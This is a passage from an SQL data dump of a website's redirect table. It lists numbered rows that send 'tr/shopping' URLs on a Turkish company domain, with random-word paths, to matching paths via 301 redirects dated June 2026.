00:00:00',301),(66630,'https://3s-technologies.com.tr/tr/shopping/pilledgarlic/2263057531.html',NULL,'https://3s-technologies.com.tr/shopping/pilledgarlic/2263057531.html','',1,0,'2026-06-10 22:19:48','0000-00-00 00:00:00',301),(66631,'https://3s-technologies.com.tr/tr/shopping/pantelegraph/3583039887.html',NULL,'https://3s-technologies.com.tr/shopping/pantelegraph/3583039887.html','',1,0,'2026-06-10 22:19:52','0000-00-00 00:00:00',301),(66632,'https://3s-technologies.com.tr/tr/shopping/unregenerate/1743971505.html',NULL,'https://3s-technologies.com.tr/shopping/unregenerate/1743971505.html','',1,0,'2026-06-10 22:19:55','0000-00-00 00:00:00',301),(66633,'https://3s-technologies.com.tr/tr/shopping/grugru/871796527.html',NULL,'https://3s-technologies.com.tr/shopping/grugru/871796527.html','',1,0,'2026-06-10 22:19:57','0000-00-00 00:00:00',301),(66634,'https://3s-technologies.com.tr/tr/shopping/landlouper/3633615030.html',NULL,'https://3s-technologies.com.tr/shopping/landlouper/3633615030.html','',1,0,'2026-06-10 22:20:02','0000-00-00 00:00:00',301),(66635,'https://3s-technologies.com.tr/tr/shopping/divisibleness/1400223637.html',NULL,'https://3s-technologies.com.tr/shopping/divisibleness/1400223637.html','',1,0,'2026-06-10 22:20:06','0000-00-00 00:00:00',301),(66636,'https://3s-technologies.com.tr/tr/shopping/coarsen/1536213022.html',NULL,'https://3s-technologies.com.tr/shopping/coarsen/1536213022.html','',1,0,'2026-06-10 22:20:09','0000-00-00 00:00:00',301),(66637,'https://3s-technologies.com.tr/tr/shopping/jetsetter/61510621.html',NULL,'https://3s-technologies.com.tr/shopping/jetsetter/61510621.html','',1,0,'2026-06-10 22:20:12','0000-00-00 00:00:00',301),(66638,'https://3s-technologies.com.tr/tr/shopping/nodosarine/978156664.html',NULL,'https://3s-technologies.com.tr/shopping/nodosarine/978156664.html','',1,0,'2026-06-10 22:20:17','0000-00-00 00:00:00',301),(66639,'https://3s-technologies.com.tr/tr/shopping/ticklenburg/1423117787.html',NULL,'https://3s-technologies.com.tr/shopping/ticklenburg/1423117787.html','',1,0,'2026-06-10 22:20:19','0000-00-00 00:00:00',301),(66640,'https://3s-technologies.com.tr/tr/shopping/livre/1329360361.html',NULL,'https://3s-technologies.com.tr/shopping/livre/1329360361.html','',1,0,'2026-06-10 22:20:22','0000-00-00 00:00:00',301),(66641,'https://3s-technologies.com.tr/tr/shopping/photism/1085031154.html',NULL,'https://3s-technologies.com.tr/shopping/photism/1085031154.html','',1,0,'2026-06-10 22:20:25','0000-00-00 00:00:00',301),(66642,'https://3s-technologies.com.tr/tr/shopping/anguillidae/2610094513.html',NULL,'https://3s-technologies.com.tr/shopping/anguillidae/2610094513.html','',1,0,'2026-06-10 22:20:28','0000-00-00 00:00:00',301),(66643,'https://3s-technologies.com.tr/tr/shopping/skimmington/60298506.html',NULL,'https://3s-technologies.com.tr/shopping/skimmington/60298506.html','',1,0,'2026-06-10 22:20:32','0000-00-00 00:00:00',301),(66644,'https://3s-technologies.com.tr/tr/shopping/pastoral/3775265634.html',NULL,'https://3s-technologies.com.tr/shopping/pastoral/3775265634.html','',1,0,'2026-06-10 22:20:51','0000-00-00 00:00:00',301),(66645,'https://3s-technologies.com.tr/tr/shopping/magistrally/294353438.html',NULL,'https://3s-technologies.com.tr/shopping/magistrally/294353438.html','',1,0,'2026-06-10 22:20:56','0000-00-00 00:00:00',301),(66646,'https://3s-technologies.com.tr/tr/shopping/meanspiritedness/1668128675.html',NULL,'https://3s-technologies.com.tr/shopping/meanspiritedness/1668128675.html','',1,0,'2026-06-10 22:21:01','0000-00-00 00:00:00',301),(66647,'https://3s-technologies.com.tr/tr/shopping/bloody/3420633240.html',NULL,'https://3s-technologies.com.tr/shopping/bloody/3420633240.html','',1,0,'2026-06-10 22:21:05','0000-00-00 00:00:00',301),(66648,'https://3s-technologies.com.tr/tr/shopping/namaycush/2493459050.html',NULL,'https://3s-technologies.com.tr/shopping/namaycush/2493459050.html','',1,0,'2026-06-10 22:21:07','0000-00-00 00:00:00',301),(66649,'https://3s-technologies.com.tr/tr/shopping/rehibition/2516795614.html',NULL,'https://3s-technologies.com.tr/shopping/rehibition/2516795614.html','',1,0,'2026-06-10 22:21:10','0000-00-00 00:00:00',301),(66650,'https://3s-technologies.com.tr/tr/shopping/overshine/1807377605.html',NULL,'https://3s-technologies.com.tr/shopping/overshine/1807377605.html','',1,0,'2026-06-10 22:21:13','0000-00-00 00:00:00',301),(66651,'https://3s-technologies.com.tr/tr/shopping/araguato/3192421378.html',NULL,'https://3s-technologies.com.tr/shopping/araguato/3192421378.html','',1,0,'2026-06-10 22:21:16','0000-00-00 00:00:00',301),(66652,'https://3s-technologies.com.tr/tr/shopping/carburetant/1122674309.html',NULL,'https://3s-technologies.com.tr/shopping/carburetant/1122674309.html','',1,0,'2026-06-10 22:21:20','0000-00-00 00:00:00',301),(66653,'https://3s-technologies.com.tr/tr/shopping/energic/2055578384.html',NULL,'https://3s-technologies.com.tr/shopping/energic/2055578384.html','',1,0,'2026-06-10 22:21:26','0000-00-00 00:00:00',301),(66654,'https://3s-technologies.com.tr/tr/shopping/splayfoot/2868541324.html',NULL,'https://3s-technologies.com.tr/shopping/splayfoot/2868541324.html','',1,0,'2026-06-10 22:21:30','0000-00-00 00:00:00',301),(66655,'https://3s-technologies.com.tr/tr/shopping/missificate/1492488297.html',NULL,'https://3s-technologies.com.tr/shopping/missificate/1492488297.html','',1,0,'2026-06-10 22:21:33','0000-00-00 00:00:00',301),(66656,'https://3s-technologies.com.tr/tr/shopping/grammarianism/3630238341.html',NULL,'https://3s-technologies.com.tr/shopping/grammarianism/3630238341.html','',1,0,'2026-06-10 22:21:37','0000-00-00 00:00:00',301),(66657,'https://3s-technologies.com.tr/tr/shopping/lagenian/3993505853.html',NULL,'https://3s-technologies.com.tr/shopping/lagenian/3993505853.html','',1,0,'2026-06-10 22:21:46','0000-00-00 00:00:00',301),(66658,'https://3s-technologies.com.tr/tr/shopping/haustorium/2255763878.html',NULL,'https://3s-technologies.com.tr/shopping/haustorium/2255763878.html','',1,0,'2026-06-10 22:21:50','0000-00-00 00:00:00',301),(66659,'https://3s-technologies.com.tr/tr/shopping/astrometeorology/2718362460.html',NULL,'https://3s-technologies.com.tr/shopping/astrometeorology/2718362460.html','',1,0,'2026-06-10 22:21:54','0000-00-00 00:00:00',301),(66660,'https://3s-technologies.com.tr/tr/shopping/londoner/3217298283.html',NULL,'https://3s-technologies.com.tr/shopping/londoner/3217298283.html','',1,0,'2026-06-10 22:22:00','0000-00-00 00:00:00',301),(66661,'https://3s-technologies.com.tr/tr/shopping/isotrimorphous/3864546538.html',NULL,'https://3s-technologies.com.tr/shopping/isotrimorphous/3864546538.html','',1,0,'2026-06-10 22:22:07','0000-00-00 00:00:00',301),(66662,'https://3s-technologies.com.tr/tr/shopping/varicosis/2654143521.html',NULL,'https://3s-technologies.com.tr/shopping/varicosis/2654143521.html','',1,0,'2026-06-10 22:22:10','0000-00-00 00:00:00',301),(66663,'https://3s-technologies.com.tr/tr/shopping/obviousness/3155604167.html',NULL,'https://3s-technologies.com.tr/shopping/obviousness/3155604167.html','',1,0,'2026-06-10 22:22:14','0000-00-00 00:00:00',301),(66664,'https://3s-technologies.com.tr/tr/shopping/flatwork/3148245855.html',NULL,'https://3s-technologies.com.tr/shopping/flatwork/3148245855.html','',1,0,'2026-06-10 22:22:17','0000-00-00 00:00:00',301),(66665,'https://3s-technologies.com.tr/tr/shopping/amphibology/2710725225.html',NULL,'https://3s-technologies.com.tr/shopping/amphibology/2710725225.html','',1,0,'2026-06-10 22:22:24','0000-00-00 00:00:00',301),(66666,'https://3s-technologies.com.tr/tr/shopping/betelgeux/2148359431.html',NULL,'https://3s-technologies.com.tr/shopping/betelgeux/2148359431.html','',1,0,'2026-06-10 22:22:28','0000-00-00 00:00:00',301),(66667,'https://3s-technologies.com.tr/tr/shopping/hotmouthed/3654951739.html',NULL,'https://3s-technologies.com.tr/shopping/hotmouthed/3654951739.html','',1,0,'2026-06-10 22:22:33','0000-00-00 00:00:00',301),(66668,'https://3s-technologies.com.tr/tr/shopping/aethiopica/2991159461.html',NULL,'https://3s-technologies.com.tr/shopping/aethiopica/2991159461.html','',1,0,'2026-06-10 22:22:38','0000-00-00 00:00:00',301),(66669,'https://3s-technologies.com.tr/tr/shopping/cavallas/2578528905.html',NULL,'https://3s-technologies.com.tr/shopping/cavallas/2578528905.html','',1,0,'2026-06-10 22:22:43','0000-00-00 00:00:00',301),(66670,'https://3s-technologies.com.tr/tr/shopping/medicornu/3647658086.html',NULL,'https://3s-technologies.com.tr/shopping/medicornu/3647658086.html','',1,0,'2026-06-10 22:22:48','0000-00-00 00:00:00',301),(66671,'https://3s-technologies.com.tr/tr/shopping/tetrasporic/2682397115.html',NULL,'https://3s-technologies.com.tr/shopping/tetrasporic/2682397115.html','',1,0,'2026-06-10 22:22:52','0000-00-00 00:00:00',301),(66672,'https://3s-technologies.com.tr/tr/shopping/besetter/1568544324.html',NULL,'https://3s-technologies.com.tr/shopping/besetter/1568544324.html','',1,0,'2026-06-10 22:22:57','0000-00-00 00:00:00',301),(66673,'https://3s-technologies.com.tr/tr/shopping/purpureal/1894104961.html',NULL,'https://3s-technologies.com.tr/shopping/purpureal/1894104961.html','',1,0,'2026-06-10 22:23:02','0000-00-00 00:00:00',301),(66674,'https://3s-technologies.com.tr/tr/shopping/jahwist/3218510382.html',NULL,'https://3s-technologies.com.tr/shopping/jahwist/3218510382.html','',1,0,'2026-06-10 22:23:06','0000-00-00 00:00:00',301),(66675,'https://3s-technologies.com.tr/tr/shopping/thermifugine/2399718724.html',NULL,'https://3s-technologies.com.tr/shopping/thermifugine/2399718724.html','',1,0,'2026-06-10 22:23:10','0000-00-00 00:00:00',301),(66676,'https://3s-technologies.com.tr/tr/shopping/isotrimorphism/2154323857.html',NULL,'https://3s-technologies.com.tr/shopping/isotrimorphism/2154323857.html','',1,0,'2026-06-10 22:23:16','0000-00-00 00:00:00',301),(66677,'https://3s-technologies.com.tr/tr/shopping/arachnothera/3457392570.html',NULL,'https://3s-technologies.com.tr/shopping/arachnothera/3457392570.html','',1,0,'2026-06-10 22:23:22','0000-00-00 00:00:00',301),(66678,'https://3s-technologies.com.tr/tr/shopping/receipting/3628476596.html',NULL,'https://3s-technologies.com.tr/shopping/receipting/3628476596.html','',1,0,'2026-06-10 22:23:26','0000-00-00 00:00:00',301),(66679,'https://3s-technologies.com.tr/tr/shopping/probed/3431358870.html',NULL,'https://3s-technologies.com.tr/shopping/probed/3431358870.html','',1,0,'2026-06-10 22:23:28','0000-00-00 00:00:00',301),(66680,'https://3s-technologies.com.tr/tr/shopping/mauling/3889885187.html',NULL,'https://3s-technologies.com.tr/shopping/mauling/3889885187.html','',1,0,'2026-06-10 22:23:37','0000-00-00 00:00:00',301),(66681,'https://3s-technologies.com.tr/tr/shopping/slack/2127331340.html',NULL,'https://3s-technologies.com.tr/shopping/slack/2127331340.html','',1,0,'2026-06-10 22:23:40','0000-00-00 00:00:00',301),(66682,'https://3s-technologies.com.tr/tr/shopping/lobately/2889820136.html',NULL,'https://3s-technologies.com.tr/shopping/lobately/2889820136.html','',1,0,'2026-06-10 22:23:44','0000-00-00 00:00:00',301),(66683,'https://3s-technologies.com.tr/tr/shopping/schemingly/1512162093.html',NULL,'https://3s-technologies.com.tr/shopping/schemingly/1512162093.html','',1,0,'2026-06-10 22:23:48','0000-00-00 00:00:00',301),(66684,'https://3s-technologies.com.tr/tr/shopping/seduce/1234564287.html',NULL,'https://3s-technologies.com.tr/shopping/seduce/1234564287.html','',1,0,'2026-06-10 22:23:52','0000-00-00 00:00:00',301),(66685,'https://3s-technologies.com.tr/tr/shopping/terminatively/3320246406.html',NULL,'https://3s-technologies.com.tr/shopping/terminatively/3320246406.html','',1,0,'2026-06-10 22:23:56','0000-00-00 00:00:00',301),(66686,'https://3s-technologies.com.tr/tr/shopping/badgered/3054833787.html',NULL,'https://3s-technologies.com.tr/shopping/badgered/3054833787.html','',1,0,'2026-06-10 22:24:01','0000-00-00 00:00:00',301),(66687,'https://3s-technologies.com.tr/tr/shopping/fixation/1666530453.html',NULL,'https://3s-technologies.com.tr/shopping/fixation/1666530453.html','',1,0,'2026-06-10 22:24:04','0000-00-00 00:00:00',301),(66688,'https://3s-technologies.com.tr/tr/shopping/woopher/2661722875.html',NULL,'https://3s-technologies.com.tr/shopping/woopher/2661722875.html','',1,0,'2026-06-10 22:24:08','0000-00-00 00:00:00',301),(66689,'https://3s-technologies.com.tr/tr/shopping/shrinking/1318421056.html',NULL,'https://3s-technologies.com.tr/shopping/shrinking/1318421056.html','',1,0,'2026-06-10 22:24:19','0000-00-00 00:00:00',301),(66690,'https://3s-technologies.com.tr/tr/shopping/conserves/2737035255.html',NULL,'https://3s-technologies.com.tr/shopping/conserves/2737035255.html','',1,0,'2026-06-10 22:24:21','0000-00-00 00:00:00',301),(66691,'https://3s-technologies.com.tr/tr/shopping/refounder/134593791.html',NULL,'https://3s-technologies.com.tr/shopping/refounder/134593791.html','',1,0,'2026-06-10 22:24:29','0000-00-00 00:00:00',301),(66692,'https://3s-technologies.com.tr/tr/shopping/crier/3333012688.html',NULL,'https://3s-technologies.com.tr/shopping/crier/3333012688.html','',1,0,'2026-06-10 22:24:32','0000-00-00 00:00:00',301),(66693,'https://3s-technologies.com.tr/tr/shopping/limning/1175255162.html',NULL,'https://3s-technologies.com.tr/shopping/limning/1175255162.html','',1,0,'2026-06-10 22:24:36','0000-00-00 00:00:00',301),(66694,'https://3s-technologies.com.tr/tr/shopping/scaur/1587841368.html',NULL,'https://3s-technologies.com.tr/shopping/scaur/1587841368.html','',1,0,'2026-06-10 22:24:40','0000-00-00 00:00:00',301),(66695,'https://3s-technologies.com.tr/tr/shopping/phenocryst/3673296276.html',NULL,'https://3s-technologies.com.tr/shopping/phenocryst/3673296276.html','',1,0,'2026-06-10 22:24:44','0000-00-00 00:00:00',301),(66696,'https://3s-technologies.com.tr/tr/shopping/indefectible/1868627717.html',NULL,'https://3s-technologies.com.tr/shopping/indefectible/1868627717.html','',1,0,'2026-06-10 22:24:48','0000-00-00 00:00:00',301),(66697,'https://3s-technologies.com.tr/tr/shopping/desiderable/3446500856.html',NULL,'https://3s-technologies.com.tr/shopping/desiderable/3446500856.html','',1,0,'2026-06-10 22:24:52','0000-00-00 00:00:00',301),(66698,'https://3s-technologies.com.tr/tr/shopping/agalloch/286937245.html',NULL,'https://3s-technologies.com.tr/shopping/agalloch/286937245.html','',1,0,'2026-06-10 22:24:56','0000-00-00 00:00:00',301),(66699,'https://3s-technologies.com.tr/tr/shopping/invalidate/1790620313.html',NULL,'https://3s-technologies.com.tr/shopping/invalidate/1790620313.html','',1,0,'2026-06-10 22:25:00','0000-00-00 00:00:00',301),(66700,'https://3s-technologies.com.tr/tr/shopping/extroversive/2996373532.html',NULL,'https://3s-technologies.com.tr/shopping/extroversive/2996373532.html','',1,0,'2026-06-10 22:25:04','0000-00-00 00:00:00',301),(66701,'https://3s-technologies.com.tr/tr/shopping/herons/1627675199.html',NULL,'https://3s-technologies.com.tr/shopping/herons/1627675199.html','',1,0,'2026-06-10 22:25:08','0000-00-00 00:00:00',301),(66702,'https://3s-technologies.com.tr/tr/shopping/overrode/558382495.html',NULL,'https://3s-technologies.com.tr/shopping/overrode/558382495.html','',1,0,'2026-06-10 22:25:12','0000-00-00 00:00:00',301),(66703,'https://3s-technologies.com.tr/tr/shopping/deadlight/4027388411.html',NULL,'https://3s-technologies.com.tr/shopping/deadlight/4027388411.html','',1,0,'2026-06-10 22:25:16','0000-00-00 00:00:00',301),(66704,'https://3s-technologies.com.tr/tr/shopping/vegetality/2636075298.html',NULL,'https://3s-technologies.com.tr/shopping/vegetality/2636075298.html','',1,0,'2026-06-10 22:25:20','0000-00-00 00:00:00',301),(66705,'https://3s-technologies.com.tr/tr/shopping/flammens/696796062.html',NULL,'https://3s-technologies.com.tr/shopping/flammens/696796062.html','',1,0,'2026-06-10 22:25:24','0000-00-00 00:00:00',301),(66706,'https://3s-technologies.com.tr/tr/shopping/uranutan/113138967.html',NULL,'https://3s-technologies.com.tr/shopping/uranutan/113138967.html','',1,0,'2026-06-10 22:25:27','0000-00-00 00:00:00',301),(66707,'https://3s-technologies.com.tr/tr/shopping/ambitiously/1510786455.html',NULL,'https://3s-technologies.com.tr/shopping/ambitiously/1510786455.html','',1,0,'2026-06-10 22:25:31','0000-00-00 00:00:00',301),(66708,'https://3s-technologies.com.tr/tr/shopping/transpose/1086809605.html',NULL,'https://3s-technologies.com.tr/shopping/transpose/1086809605.html','',1,0,'2026-06-10 22:25:35','0000-00-00 00:00:00',301),(66709,'https://3s-technologies.com.tr/tr/shopping/copaifera/516124482.html',NULL,'https://3s-technologies.com.tr/shopping/copaifera/516124482.html','',1,0,'2026-06-10 22:25:40','0000-00-00 00:00:00',301),(66710,'https://3s-technologies.com.tr/tr/shopping/astronomize/3132710049.html',NULL,'https://3s-technologies.com.tr/shopping/astronomize/3132710049.html','',1,0,'2026-06-10 22:25:44','0000-00-00 00:00:00',301),(66711,'https://3s-technologies.com.tr/tr/shopping/osculating/1395085203.html',NULL,'https://3s-technologies.com.tr/shopping/osculating/1395085203.html','',1,0,'2026-06-10 22:25:48','0000-00-00 00:00:00',301),(66712,'https://3s-technologies.com.tr/tr/shopping/ploce/916248380.html',NULL,'https://3s-technologies.com.tr/shopping/ploce/916248380.html','',1,0,'2026-06-10 22:25:52','0000-00-00 00:00:00',301),(66713,'https://3s-technologies.com.tr/tr/shopping/eclectic/2541269312.html',NULL,'https://3s-technologies.com.tr/shopping/eclectic/2541269312.html','',1,0,'2026-06-10 22:25:56','0000-00-00 00:00:00',301),(66714,'https://3s-technologies.com.tr/tr/shopping/pigging/3070369577.html',NULL,'https://3s-technologies.com.tr/shopping/pigging/3070369577.html','',1,0,'2026-06-10 22:26:00','0000-00-00 00:00:00',301),(66715,'https://3s-technologies.com.tr/tr/shopping/predacean/578325254.html',NULL,'https://3s-technologies.com.tr/shopping/predacean/578325254.html','',1,0,'2026-06-10 22:26:04','0000-00-00 00:00:00',301),(66716,'https://3s-technologies.com.tr/tr/shopping/entities/1538087558.html',NULL,'https://3s-technologies.com.tr/shopping/entities/1538087558.html','',1,0,'2026-06-10 22:26:08','0000-00-00 00:00:00',301),(66717,'https://3s-technologies.com.tr/tr/shopping/exodic/2153774195.html',NULL,'https://3s-technologies.com.tr/shopping/exodic/2153774195.html','',1,0,'2026-06-10 22:26:12','0000-00-00 00:00:00',301),(66718,'https://3s-technologies.com.tr/tr/shopping/chronicle/2149185423.html',NULL,'https://3s-technologies.com.tr/shopping/chronicle/2149185423.html','',1,0,'2026-06-10 22:26:16','0000-00-00 00:00:00',301),(66719,'https://3s-technologies.com.tr/tr/shopping/shake/1624134987.html',NULL,'https://3s-technologies.com.tr/shopping/shake/1624134987.html','',1,0,'2026-06-10 22:26:20','0000-00-00 00:00:00',301),(66720,'https://3s-technologies.com.tr/tr/shopping/dubiousness/2710175595.html',NULL,'https://3s-technologies.com.tr/shopping/dubiousness/2710175595.html','',1,0,'2026-06-10 22:26:24','0000-00-00 00:00:00',301),(66721,'https://3s-technologies.com.tr/tr/shopping/rheometer/2072988726.html',NULL,'https://3s-technologies.com.tr/shopping/rheometer/2072988726.html','',1,0,'2026-06-10 22:26:28','0000-00-00 00:00:00',301),(66722,'https://3s-technologies.com.tr/tr/shopping/buccaneer/2394726729.html',NULL,'https://3s-technologies.com.tr/shopping/buccaneer/2394726729.html','',1,0,'2026-06-10 22:26:32','0000-00-00 00:00:00',301),(66723,'https://3s-technologies.com.tr/tr/shopping/decocted/3653353517.html',NULL,'https://3s-technologies.com.tr/shopping/decocted/3653353517.html','',1,0,'2026-06-10 22:26:36','0000-00-00 00:00:00',301),(66724,'https://3s-technologies.com.tr/tr/shopping/preexisted/2918237253.html',NULL,'https://3s-technologies.com.tr/shopping/preexisted/2918237253.html','',1,0,'2026-06-10 22:26:40','0000-00-00 00:00:00',301),(66725,'https://3s-technologies.com.tr/tr/shopping/appertinent/264270338.html',NULL,'https://3s-technologies.com.tr/shopping/appertinent/264270338.html','',1,0,'2026-06-10 22:26:45','0000-00-00 00:00:00',301),(66726,'https://3s-technologies.com.tr/tr/shopping/bract/2984184695.html',NULL,'https://3s-technologies.com.tr/shopping/bract/2984184695.html','',1,0,'2026-06-10 22:26:48','0000-00-00 00:00:00',301),(66727,'https://3s-technologies.com.tr/tr/shopping/varia/2459625611.html',NULL,'https://3s-technologies.com.tr/shopping/varia/2459625611.html','',1,0,'2026-06-10 22:26:52','0000-00-00 00:00:00',301),(66728,'https://3s-technologies.com.tr/tr/shopping/appliable/104913882.html',NULL,'https://3s-technologies.com.tr/shopping/appliable/104913882.html','',1,0,'2026-06-10 22:26:56','0000-00-00 00:00:00',301),(66729,'https://3s-technologies.com.tr/tr/shopping/ageratum/772033910.html',NULL,'https://3s-technologies.com.tr/shopping/ageratum/772033910.html','',1,0,'2026-06-10 22:27:00','0000-00-00 00:00:00',301),(66730,'https://3s-technologies.com.tr/tr/shopping/utilitarianism/1235776386.html',NULL,'https://3s-technologies.com.tr/shopping/utilitarianism/1235776386.html','',1,0,'2026-06-10 22:27:04','0000-00-00 00:00:00',301),(66731,'https://3s-technologies.com.tr/tr/shopping/quintupled/39624266.html',NULL,'https://3s-technologies.com.tr/shopping/quintupled/39624266.html','',1,0,'2026-06-10 22:27:08','0000-00-00 00:00:00',301),(66732,'https://3s-technologies.com.tr/tr/shopping/vastation/2908896154.html',NULL,'https://3s-technologies.com.tr/shopping/vastation/2908896154.html','',1,0,'2026-06-10 22:27:12','0000-00-00 00:00:00',301),(66733,'https://3s-technologies.com.tr/tr/shopping/dashboard/1466175706.html',NULL,'https://3s-technologies.com.tr/shopping/dashboard/1466175706.html','',1,0,'2026-06-10 22:27:17','0000-00-00 00:00:00',301),(66734,'https://3s-technologies.com.tr/tr/shopping/noologist/501030087.html',NULL,'https://3s-technologies.com.tr/shopping/noologist/501030087.html','',1,0,'2026-06-10 22:27:22','0000-00-00 00:00:00',301),(66735,'https://3s-technologies.com.tr/tr/shopping/bannition/3479555239.html',NULL,'https://3s-technologies.com.tr/shopping/bannition/3479555239.html','',1,0,'2026-06-10 22:27:26','0000-00-00 00:00:00',301),(66736,'https://3s-technologies.com.tr/tr/shopping/didst/4058229726.html',NULL,'https://3s-technologies.com.tr/shopping/didst/4058229726.html','',1,0,'2026-06-10 22:27:30','0000-00-00 00:00:00',301),(66737,'https://3s-technologies.com.tr/tr/shopping/hodman/4282664652.html',NULL,'https://3s-technologies.com.tr/shopping/hodman/4282664652.html','',1,0,'2026-06-10 22:27:34','0000-00-00 00:00:00',301),(66738,'https://3s-technologies.com.tr/tr/shopping/picric/2294515875.html',NULL,'https://3s-technologies.com.tr/shopping/picric/2294515875.html','',1,0,'2026-06-10 22:27:38','0000-00-00 00:00:00',301),(66739,'https://3s-technologies.com.tr/tr/shopping/doomster/3586126522.html',NULL,'https://3s-technologies.com.tr/shopping/doomster/3586126522.html','',1,0,'2026-06-10 22:27:42','0000-00-00 00:00:00',301),(66740,'https://3s-technologies.com.tr/tr/shopping/priggishness/2391090448.html',NULL,'https://3s-technologies.com.tr/shopping/priggishness/2391090448.html','',1,0,'2026-06-10 22:27:46','0000-00-00 00:00:00',301),(66741,'https://3s-technologies.com.tr/tr/shopping/pasty/2957047131.html',NULL,'https://3s-technologies.com.tr/shopping/pasty/2957047131.html','',1,0,'2026-06-10 22:27:50','0000-00-00 00:00:00',301),(66742,'https://3s-technologies.com.tr/tr/shopping/ectostosis/3080922775.html',NULL,'https://3s-technologies.com.tr/shopping/ectostosis/3080922775.html','',1,0,'2026-06-10 22:27:54','0000-00-00 00:00:00',301),(66743,'https://3s-technologies.com.tr/tr/shopping/manic/4052265300.html',NULL,'https://3s-technologies.com.tr/shopping/manic/4052265300.html','',1,0,'2026-06-10 22:27:58','0000-00-00 00:00:00',301),(66744,'https://3s-technologies.com.tr/tr/shopping/cabob/1227647370.html',NULL,'https://3s-technologies.com.tr/shopping/cabob/1227647370.html','',1,0,'2026-06-10 22:28:04','0000-00-00 00:00:00',301),(66745,'https://3s-technologies.com.tr/tr/shopping/cimeliarch/2368030592.html',NULL,'https://3s-technologies.com.tr/shopping/cimeliarch/2368030592.html','',1,0,'2026-06-10 22:28:08','0000-00-00 00:00:00',301),(66746,'https://3s-technologies.com.tr/tr/shopping/intractably/2836430045.html',NULL,'https://3s-technologies.com.tr/shopping/intractably/2836430045.html','',1,0,'2026-06-10 22:28:12','0000-00-00 00:00:00',301),(66747,'https://3s-technologies.com.tr/tr/shopping/massora/758315169.html',NULL,'https://3s-technologies.com.tr/shopping/massora/758315169.html','',1,0,'2026-06-10 22:28:16','0000-00-00 00:00:00',301),(66748,'https://3s-technologies.com.tr/tr/shopping/unconnected/3998920601.html',NULL,'https://3s-technologies.com.tr/shopping/unconnected/3998920601.html','',1,0,'2026-06-10 22:28:20','0000-00-00 00:00:00',301),(66749,'https://3s-technologies.com.tr/tr/shopping/mimir/3509235148.html',NULL,'https://3s-technologies.com.tr/shopping/mimir/3509235148.html','',1,0,'2026-06-10 22:28:24','0000-00-00 00:00:00',301),(66750,'https://3s-technologies.com.tr/tr/shopping/fivepenny/1093986130.html',NULL,'https://3s-technologies.com.tr/shopping/fivepenny/1093986130.html','',1,0,'2026-06-10 22:28:28','0000-00-00 00:00:00',301),(66751,'https://3s-technologies.com.tr/tr/shopping/lipoa/4028764033.html',NULL,'https://3s-technologies.com.tr/shopping/lipoa/4028764033.html','',1,0,'2026-06-10 22:28:32','0000-00-00 00:00:00',301),(66752,'https://3s-technologies.com.tr/tr/shopping/resist/3039902915.html',NULL,'https://3s-technologies.com.tr/shopping/resist/3039902915.html','',1,0,'2026-06-10 22:28:36','0000-00-00 00:00:00',301),(66753,'https://3s-technologies.com.tr/tr/shopping/nacreous/703972571.html',NULL,'https://3s-technologies.com.tr/shopping/nacreous/703972571.html','',1,0,'2026-06-10 22:28:40','0000-00-00 00:00:00',301),(66754,'https://3s-technologies.com.tr/tr/shopping/calomys/874016405.html',NULL,'https://3s-technologies.com.tr/shopping/calomys/874016405.html','',1,0,'2026-06-10 22:28:44','0000-00-00 00:00:00',301),(66755,'https://3s-technologies.com.tr/tr/shopping/merrythought/3286799090.html',NULL,'https://3s-technologies.com.tr/shopping/merrythought/3286799090.html','',1,0,'2026-06-10 22:28:48','0000-00-00 00:00:00',301),(66756,'https://3s-technologies.com.tr/tr/shopping/clanged/949468469.html',NULL,'https://3s-technologies.com.tr/shopping/clanged/949468469.html','',1,0,'2026-06-10 22:28:52','0000-00-00 00:00:00',301),(66757,'https://3s-technologies.com.tr/tr/shopping/shetting/23481327.html',NULL,'https://3s-technologies.com.tr/shopping/shetting/23481327.html','',1,0,'2026-06-10 22:28:58','0000-00-00 00:00:00',301),(66758,'https://3s-technologies.com.tr/tr/shopping/lolling/2651169677.html',NULL,'https://3s-technologies.com.tr/shopping/lolling/2651169677.html','',1,0,'2026-06-10 22:29:01','0000-00-00 00:00:00',301),(66759,'https://3s-technologies.com.tr/tr/shopping/abomasal/1890178626.html',NULL,'https://3s-technologies.com.tr/shopping/abomasal/1890178626.html','',1,0,'2026-06-10 22:29:05','0000-00-00 00:00:00',301),(66760,'https://3s-technologies.com.tr/tr/shopping/ragamuffin/1043878436.html',NULL,'https://3s-technologies.com.tr/shopping/ragamuffin/1043878436.html','',1,0,'2026-06-10 22:29:09','0000-00-00 00:00:00',301),(66761,'https://3s-technologies.com.tr/tr/shopping/clicketyclack/629472982.html',NULL,'https://3s-technologies.com.tr/shopping/clicketyclack/629472982.html','',1,0,'2026-06-10 22:29:13','0000-00-00 00:00:00',301),(66762,'https://3s-technologies.com.tr/tr/shopping/florin/108550179.html',NULL,'https://3s-technologies.com.tr/shopping/florin/108550179.html','',1,0,'2026-06-10 22:29:17','0000-00-00 00:00:00',301),(66763,'https://3s-technologies.com.tr/tr/shopping/drier/2322424143.html',NULL,'https://3s-technologies.com.tr/shopping/drier/2322424143.html','',1,0,'2026-06-10 22:29:21','0000-00-00 00:00:00',301),(66764,'https://3s-technologies.com.tr/tr/shopping/cheval/3249155919.html',NULL,'https://3s-technologies.com.tr/shopping/cheval/3249155919.html','',1,0,'2026-06-10 22:29:25','0000-00-00 00:00:00',301),(66765,'https://3s-technologies.com.tr/tr/shopping/maronite/1089233819.html',NULL,'https://3s-technologies.com.tr/shopping/maronite/1089233819.html','',1,0,'2026-06-10 22:29:29','0000-00-00 00:00:00',301),(66766,'https://3s-technologies.com.tr/tr/shopping/sigger/3911687143.html',NULL,'https://3s-technologies.com.tr/shopping/sigger/3911687143.html','',1,0,'2026-06-10 22:29:33','0000-00-00 00:00:00',301),(66767,'https://3s-technologies.com.tr/tr/shopping/barycentric/1750552960.html',NULL,'https://3s-technologies.com.tr/shopping/barycentric/1750552960.html','',1,0,'2026-06-10 22:29:37','0000-00-00 00:00:00',301),(66768,'https://3s-technologies.com.tr/tr/shopping/branch/1236988469.html',NULL,'https://3s-technologies.com.tr/shopping/branch/1236988469.html','',1,0,'2026-06-10 22:29:41','0000-00-00 00:00:00',301),(66769,'https://3s-technologies.com.tr/tr/shopping/recant/3319034307.html',NULL,'https://3s-technologies.com.tr/shopping/recant/3319034307.html','',1,0,'2026-06-10 22:29:45','0000-00-00 00:00:00',301),(66770,'https://3s-technologies.com.tr/tr/shopping/boondocks/591436878.html',NULL,'https://3s-technologies.com.tr/shopping/boondocks/591436878.html','',1,0,'2026-06-10 22:29:49','0000-00-00 